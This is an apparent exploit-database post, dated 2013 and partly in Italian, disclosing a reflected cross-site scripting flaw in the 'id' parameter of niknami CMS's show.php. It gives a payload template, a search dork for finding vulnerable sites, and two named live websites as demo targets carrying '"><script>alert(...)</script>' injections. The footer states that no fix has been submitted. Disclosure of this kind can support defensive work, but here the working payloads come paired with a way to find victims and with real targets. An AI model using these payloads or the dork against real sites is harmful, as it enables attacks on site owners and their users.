niknami Cms Cross-Site Scripting Vulnerabilities
2013-07-17 16:58:53Inviato da: irist.ir
#################################
# Iranian Exploit DataBase
# http://iedb.ir
#################################
# Exploit Title : niknami Cms Cross-Site Scripting Vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : [email protected]
# Home : http://iedb.ir
# Software Link : http://www.niknami.ir/
# Security Risk : High
# Tested on : Linux
# Dork : "Design: Niknami.ir"
#################################
# Exploit :
# http://www.Site.com/show.php?page=newbooks&id=[Xss]
# Dem0 :
# http://15khordad42.ir/show.php?page=newbooks&id=202"><script>alert(/IeDb.Ir/)</script>
# http://www.oral-history.ir/show.php?page=newbooks&id=202"><script>alert(/IeDb.Ir/)</script>
#################################
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.